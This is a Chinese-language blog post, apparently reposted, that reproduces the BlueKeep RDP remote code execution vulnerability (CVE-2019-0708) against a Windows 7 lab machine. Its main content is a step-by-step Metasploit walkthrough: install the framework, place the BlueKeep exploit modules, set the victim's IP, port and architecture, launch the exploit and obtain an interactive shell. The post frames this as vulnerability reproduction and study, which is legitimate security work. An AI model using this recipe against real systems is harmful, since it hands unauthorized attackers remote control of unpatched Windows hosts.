CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現


0x01

2019年9月7日凌晨,msf上更新了0708的漏洞利用程序。

頓時安全群和朋友圈就爆炸了

-

奈何接到HW攻擊隊任務,又在家過了個中秋,0708才在今天更新。

0x02 環境

Windows 7 sp1

Kali

exp

0x02 利用

1.一鍵安裝metasploit-framework

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

2.下載Reference中的攻擊套件放置文件到msf的相應文件夾

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

msf命令:

使用msfconsole進入metasploit-framework ,reload_all重新加載0708rdp利用模塊

CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現

 

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce啟用0708RDP攻擊模塊

CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現

 

使用set RHOSTS 設置受害機IP

CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現

 

使用set RPORT 設置受害機RDP端口號

CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現

 

使用set target ID數字(可選為0-4)設置受害機機器架構

我使用的是Parallels Desktop,設置target 1

CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現

 

使用exploit開始攻擊,等待建立連接

CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現

 

建立連接以后,使用shell獲得shell,再使用python獲得交互式shell,執行whoami

CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM